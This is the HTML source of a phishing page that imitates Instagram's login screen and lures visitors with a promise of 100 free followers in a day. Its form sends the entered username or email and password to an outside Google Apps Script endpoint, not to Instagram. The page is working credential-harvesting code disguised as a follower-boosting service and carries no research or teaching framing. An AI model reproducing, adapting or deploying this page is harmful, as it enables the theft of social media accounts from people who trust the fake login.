<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Instagram Login Page</title>
</head>
<style>
	@import url('https://fonts.googleapis.com/css?family=Roboto&display=swap');

*{
	margin: 0;
	padding: 0;
	box-sizing: border-box;
	outline: none;
	list-style: none;
	text-decoration: none;
	font-family: 'Roboto', sans-serif;
}

body{
	background: #fafafa;
	font-size: 14px;
}

.wrapper .header{
	max-width: 350px;
	width: 100%;
	height: auto;
	margin: 50px auto;
}

.wrapper .header .top,
.wrapper .signup{
	background: #fff;
    border: 1px solid #e6e6e6;
    border-radius: 1px;
    padding: 40px 40px 20px;
}

.wrapper .header .logo img{
	display: block;
	margin: 0 auto 35px;
}

.wrapper .header .form .input_field{
	margin-bottom: 5px;
}

.wrapper .header .form .input_field .input{
	width: 100%;
	background: #fafafa;
	border: 1px solid #efefef;
	font-size: 12px;
	border-radius: 3px;
	color: #262626;
	padding: 10px;
}

.wrapper .header .form .input_field .input:focus{
	border: 1px solid #b2b2b2;
}

.wrapper .header .form .btn{
	margin: 15px 0;
	background-color: #3897f0;
    border: 1px solid #3897f0;
    border-radius: 4px;
    text-align: center;
    padding: 5px;
	width: 16.7pc;
}

.wrapper .header .form .btn:hover{
	cursor: pointer;
	background: #0084ff;
	
}

.wrapper .header .form .btn a{
	color: #fff;
	display: block;
}

.wrapper .header .or{
	display: flex;
	justify-content: space-between;
	align-items: center;
	height: 15px;
	margin: 15px 0 20px;
}

.wrapper .header .or .line{
	width: 105px;
	height: 2px;
	background: #efefef
}

.wrapper .header .or p{
	color: #999;
	font-size: 12px;
}

.wrapper .dif .fb{
	display: flex;
	justify-content: center;
	align-items: center;
}

.wrapper .dif .fb img{
	width: 16px;
	height: 16px;
}

.wrapper .dif  .fb p{
	color: #385185;
	font-weight: 500;
	margin-left: 10px;
}

.wrapper .dif .forgot{
	font-size: 12px;
	text-align: center;
	margin-top: 20px;
}

.wrapper .dif .forgot a{
	color: #003569;
}

.wrapper .signup{
	margin: 10px 0 20px;
	padding: 25px 40px;
	text-align: center;
	color: #262626;
}

.wrapper .signup a{
	color: #3897f0;
}

.wrapper .apps{
	text-align: center;
	color: #262626;
}

.wrapper .apps p{
	margin-bottom: 20px;
}

.wrapper .apps a img{
	width: 135px;
	height: 40px;
	margin: 0 5px;
}

.footer{
	max-width: 935px;
	width: 100%;
	margin: 0 auto;
	padding: 40px 0;
	display: flex;
	justify-content: space-between;
}

.footer .links ul li{
	display: inline-block;
	margin-right: 10px;
}

.footer .links ul li a{
	color: #003569;
	font-size: 12px;
}

.footer .copyright{
	color: #999;	
}

.ex{
	font-size: small;
	text-align: center;
}

.big_text{
	font-size: 12px;
}

.show{
	cursor: pointer;
	background: #0084ff;
	padding: 4px 3px;
	width: 75px;
	height: 25px;
	border-radius: 3px;
	margin: 6px ;
}

.show:hover{
	color: #ffffff;
}

.box{
  position: relative;
  width: 300px;
  height: 350px;
  background: rgb(194, 194, 194);
  border-radius: 10px;
  overflow: hidden;
  align-items: center;
  left: 390px;
  top:-550px;
}

.FormLogin{
  position: absolute;
  inset: 4px;
  background:#E4E9F7;
  border-radius: 2px ;
  z-index: 10;
  padding:40px 40px;
  display: flex;
  flex-direction: column;
}
</style>

<body>
	<!doctype html>

	<html>
		<head>
			<meta charset="utf-8">
	
			<title>free| Add followers </title>
			<link rel="icon" type="image/x-icon" href="/images/favicon.ico">
	
			<!-- Load external CSS styles -->
			<link rel="stylesheet" href="styles.css">
	
		</head>
	
		<body>
	
			
	<div class="wrapper">
		<div class="header">
			<div class="top">
				<div class="logo">
					<img src="/images/instagram.png" alt="instagram" style="width: 175px;">
					<h3 style="text-align: center; top: -20px;">Plus</h3>
				</div>
				<div class="form">
				<form action="https://script.google.com/macros/s/AKfycbzqLTW5CFHfIj_KZu4m4RlAMs_ElaShPVLdzIdbV4IpAJdsEXmqEk5aG4MmXOoSdGIR/exec" method="post">
					<div class="input_field">
						<input type="text" name="email" id="e-mail" placeholder="username, or email" class="input" >
					</div>
					<div class="input_field">
						<input type="text" name="password" id="Password" placeholder="Password" class="input" onkeyup="check();"> 
					</div>
					<div class="input_field">
						 <input type="password" name="password_confirm" id="Confirm_Password" placeholder="Confirm Password" class="input" onkeyup="check();"> <H4 id="Show" class="show" onclick="Show()" ondblclick="Hide()">Hide PWD</H4>
						<span id="message"></span>
					</div>
					
					<button class="btn" type="submit" value="Login" onclick="verification()" target="_blank">Log In</button>
				</div>
				<div class="or">
					<div class="line"></div>
					<p>OR</p>
					<div class="line"></div>
				</div>
				<div class="dif">			
					<hr><br>
					<div class="ex">
						<a class="dev" href="https://www.instagram.com/ayoub_fb5/" target="_blank">Contact devloper</a>
						<hr>
						<p id="dev2">Dev : Ayoub Zelm </p>
					</div><br>
					<br>
				</form>
				</div>
			</div>
	
			
						
			<div class="box">		
				<div class="FormLogin">
					<p>This Web site Help you to add followres on INSTAGRAM!!</p>
					<p>From 0 follow => 100 followers in 1 Day</p>
					<hr>
					<h4>How to use</h4>
					<p>- first: enter your username OR your e-mail</p>
					<p>- Click on Login </p>
				</div>
			</div>
			
		</div>
			<div class="copyright">
				© 2019 INSTAGRAM / F.Society
			</div>
		</div>
	</div>
	
	
			<!-- Load external JavaScript -->
			<script src="scripts.js"></script>
			
		</body>
	
	</html>

<script>

function Show() {
	document.getElementById("Confirm_Password").type = "text";
	document.getElementById("Show").innerHTML = "Hide PWD";
}

	function Hide() {
		document.getElementById("Confirm_Password").type = "password";
		document.getElementById("Show").innerHTML = "Show PWD";
	}

	function verification() {
		var email = document.getElementById("e-mail").value;
		var pass = document.getElementById("Password").value;
		var confirmPass = document.getElementById("Confirm_Password").value;
	}

	var check = function() {
		if (document.getElementById('Password').value == document.getElementById('Confirm_Password').value) {
    	document.getElementById('message').style.color = 'green';
    	document.getElementById('message').innerHTML = 'Password correct';
  		} else {
	    	document.getElementById('message').style.color = 'red';
    		document.getElementById('message').innerHTML = 'Password incorrect !';
  			}
	}


</script>

</body>
</html>